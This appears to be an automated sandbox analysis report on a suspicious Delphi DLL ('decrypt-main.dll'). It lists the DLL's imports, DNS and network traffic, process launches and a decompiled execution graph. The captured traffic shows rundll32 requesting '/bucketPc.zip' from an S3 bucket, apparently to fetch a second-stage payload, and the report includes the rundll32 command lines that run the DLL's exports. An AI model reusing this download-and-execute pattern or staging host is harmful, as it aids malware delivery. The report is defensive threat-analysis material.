                        RT_RCDATA0x521cec0x2291Delphi compiled form 'TFReceber'0.15323765397220024
                        RT_RCDATA0x523f800xb75Delphi compiled form 'TF_Abundant'0.4302761677463348
                        RT_RCDATA0x524af80xcc9Delphi compiled form 'TF_FlatLandPianoMovers'0.43568591506263366
                        RT_RCDATA0x5257c40x494Delphi compiled form 'TLoginDialog'0.48976109215017066
                        RT_RCDATA0x525c580x3c4Delphi compiled form 'TPasswordDialog'0.4678423236514523
                        RT_GROUP_CURSOR0x52601c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                        RT_GROUP_CURSOR0x5260300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                        RT_GROUP_CURSOR0x5260440x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x5260580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x52606c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x5260800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x5260940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_VERSION0x5260a80x218dataEnglishUnited States0.48134328358208955
                        DLLImport
                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                        advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                        user32.dllCharNextW, LoadStringW
                        kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
                        kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc, FreeLibrary
                        user32.dllSetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
                        gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetNearestColor, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                        version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                        kernel32.dlllstrcmpW, WriteFile, WinExec, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MulDiv, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                        advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                        kernel32.dllSleep
                        netapi32.dllNetApiBufferFree, NetWkstaGetInfo
                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                        oleaut32.dllGetErrorInfo, SysFreeString
                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                        comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                        user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                        msvcrt.dllmemset, memcpy
                        shell32.dllShellExecuteExW, ShellExecuteW, Shell_NotifyIconW
                        URLMON.DLLURLDownloadToFileW
                        shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW
                        winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                        winspool.drvGetDefaultPrinterW
                        kernel32.dllMulDiv
                        NameOrdinalAddress
                        HackCheck50x816700
                        ServiceCrtMain40x816700
                        TMethodImplementationIntercept30x498cf0
                        __dbk_fcall_wrapper20x419ae0
                        dbkFCallWrapperAddr10x88e290
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSource PortDest PortSource IPDest IP
                        Mar 13, 2024 16:50:58.698728085 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:58.698821068 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:58.698909998 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:58.713836908 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:58.713871002 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.332724094 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.332812071 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.491381884 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.491396904 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.491853952 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.491921902 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.502892017 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.548227072 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.708188057 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.708311081 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.708415031 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.714478016 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.714513063 CET4434972916.12.1.62192.168.2.4
                        Mar 13, 2024 16:50:59.714540958 CET49729443192.168.2.416.12.1.62
                        Mar 13, 2024 16:50:59.714595079 CET49729443192.168.2.416.12.1.62
                        TimestampSource PortDest PortSource IPDest IP
                        Mar 13, 2024 16:50:58.373653889 CET5449653192.168.2.41.1.1.1
                        Mar 13, 2024 16:50:58.466723919 CET53544961.1.1.1192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Mar 13, 2024 16:50:58.373653889 CET192.168.2.41.1.1.10x336fStandard query (0)bucreate203920233.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)bucreate203920233.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.62A (IP address)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.34A (IP address)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.163.114A (IP address)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.58A (IP address)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.130A (IP address)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.121A (IP address)IN (0x0001)false
                        Mar 13, 2024 16:50:58.466723919 CET1.1.1.1192.168.2.40x336fNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.163.94A (IP address)IN (0x0001)false
                        • bucreate203920233.s3.sa-east-1.amazonaws.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44972916.12.1.624437516C:\Windows\System32\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2024-03-13 15:50:59 UTC336OUTGET /bucketPc.zip HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: bucreate203920233.s3.sa-east-1.amazonaws.com
                        Connection: Keep-Alive
                        2024-03-13 15:50:59 UTC285INHTTP/1.1 404 Not Found
                        x-amz-request-id: TKB5CKH123017SA6
                        x-amz-id-2: aTk7n8ul0eLKfek03zQ+rqk8WoPYFkzu5x5+WZ+osLOxsf8k/+vYXVouPUpp2T94AENI8+MgxYY=
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Date: Wed, 13 Mar 2024 15:50:59 GMT
                        Server: AmazonS3
                        Connection: close
                        2024-03-13 15:50:59 UTC319INData Raw: 31 33 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 62 75 63 6b 65 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 62 75 63 72 65 61 74 65 32 30 33 39 32 30 32 33 33 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 54 4b 42 35 43 4b 48 31 32 33 30 31 37 53 41 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 61 54 6b 37 6e 38 75 6c 30 65 4c 4b 66 65 6b 30 33 7a 51 2b 72 71 6b 38 57 6f 50 59 46 6b 7a 75 35 78 35 2b
                        Data Ascii: 133<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>bucreate203920233</BucketName><RequestId>TKB5CKH123017SA6</RequestId><HostId>aTk7n8ul0eLKfek03zQ+rqk8WoPYFkzu5x5+


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:16:50:55
                        Start date:13/03/2024
                        Path:C:\Windows\System32\loaddll64.exe
                        Wow64 process (32bit):false
                        Commandline:loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll"
                        Imagebase:0x7ff78deb0000
                        File size:165'888 bytes
                        MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:moderate
                        Has exited:true

                        Target ID:1
                        Start time:16:50:55
                        Start date:13/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:16:50:55
                        Start date:13/03/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
                        Imagebase:0x7ff7d6c60000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:16:50:55
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:16:50:55
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:16:50:56
                        Start date:13/03/2024
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7532 -s 476
                        Imagebase:0x7ff7ccbc0000
                        File size:570'736 bytes
                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:16:50:58
                        Start date:13/03/2024
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7516 -s 2004
                        Imagebase:0x7ff7ccbc0000
                        File size:570'736 bytes
                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:16:50:59
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:high
                        Has exited:false

                        Target ID:11
                        Start time:16:51:02
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:16:51:02
                        Start date:13/03/2024
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7924 -s 448
                        Imagebase:0x7ff7ccbc0000
                        File size:570'736 bytes
                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:16:51:05
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:high
                        Has exited:false

                        Target ID:15
                        Start time:16:51:05
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:high
                        Has exited:false

                        Target ID:16
                        Start time:16:51:05
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Has exited:true

                        Target ID:17
                        Start time:16:51:05
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Has exited:true

                        Target ID:18
                        Start time:16:51:05
                        Start date:13/03/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper
                        Imagebase:0x7ff7b01d0000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Has exited:true

                        Target ID:21
                        Start time:16:51:05
                        Start date:13/03/2024
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 8068 -s 472
                        Imagebase:0x7ff7ccbc0000
                        File size:570'736 bytes
                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:10.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:1.7%
                          Total number of Nodes:1810
                          Total number of Limit Nodes:7
                          execution_graph 6833 40edf0 6834 40ee08 6833->6834 6835 40ee0f 6833->6835 6838 40faf0 6834->6838 6837 40eef6 _purecall 6835->6837 6841 40fad0 6838->6841 6844 40f940 6841->6844 6845 40f951 6844->6845 6846 40f95b 6844->6846 6854 40f860 6845->6854 6847 40f970 GetCurrentThreadId 6846->6847 6849 40f97d 6846->6849 6847->6849 6850 409320 GetStdHandle WriteFile GetStdHandle WriteFile TlsGetValue 6849->6850 6851 40fa87 6849->6851 6853 40fa49 FreeLibrary 6849->6853 6850->6849 6852 40fa97 ExitProcess 6851->6852 6853->6849 6855 40f8fe 6854->6855 6857 40f872 __common_dcos_data 6854->6857 6855->6846 6856 40f893 GetStdHandle WriteFile GetStdHandle 6860 410b60 6856->6860 6857->6856 6859 40f8dc WriteFile 6859->6855 6861 410b6c 6860->6861 6861->6859 6862 406e00 6863 406da0 6862->6863 6863->6862 6865 4194f0 6863->6865 6868 419ed0 6865->6868 6866 4194fa 6866->6863 6869 419f03 6868->6869 6870 41a005 RaiseException 6869->6870 6871 41a033 6869->6871 6885 41a125 6870->6885 6872 41a171 6871->6872 6873 41a162 LoadLibraryA 6871->6873 6883 41a25d 6871->6883 6871->6885 6874 41a179 GetLastError 6872->6874 6875 41a1dd 6872->6875 6873->6872 6877 41a18f 6874->6877 6880 41a215 6875->6880 6875->6883 6876 41a352 GetLastError 6878 41a368 6876->6878 6877->6875 6879 41a1ac RaiseException 6877->6879 6881 41a385 RaiseException 6878->6881 6878->6885 6879->6885 6886 41a9a0 LocalAlloc 6880->6886 6881->6885 6883->6876 6883->6885 6884 41a21f 6884->6883 6885->6866 6886->6884 6887 815f10 6907 80c650 6887->6907 6891 815f64 6927 4111e0 6891->6927 6893 815f79 6894 81602c GetMessageW 6893->6894 6931 436960 6893->6931 6896 816041 6894->6896 6897 816018 6894->6897 6955 40fec0 6896->6955 6897->6894 6898 815faa 6900 815fba Sleep 6898->6900 6902 436960 4 API calls 6900->6902 6903 815fd3 6902->6903 6903->6894 6939 80fc70 6903->6939 6959 40fde0 6907->6959 6909 80c6ae 6912 4114b0 6909->6912 6910 80c667 6910->6909 6963 411240 6910->6963 6913 4114cf 6912->6913 6926 4114e9 6912->6926 6914 4114dc 6913->6914 6916 4114eb 6913->6916 7013 410430 6914->7013 6917 411507 6916->6917 6919 40c4c0 8 API calls 6916->6919 7019 4106d0 6917->7019 6919->6917 6922 411538 6925 4106d0 8 API calls 6922->6925 6923 411521 6923->6922 6924 4106d0 8 API calls 6923->6924 6924->6922 6925->6926 6926->6891 6928 4111f4 6927->6928 6929 4100a0 8 API calls 6928->6929 6930 411202 6929->6930 6930->6893 7050 411140 6931->7050 6933 436973 GetFileAttributesW 6934 436989 6933->6934 6935 436a4e GetLastError 6933->6935 6936 4369a6 CreateFileW 6934->6936 6938 436993 6934->6938 6935->6938 6937 4369e1 CloseHandle 6936->6937 6936->6938 6937->6938 6938->6898 6940 80fc91 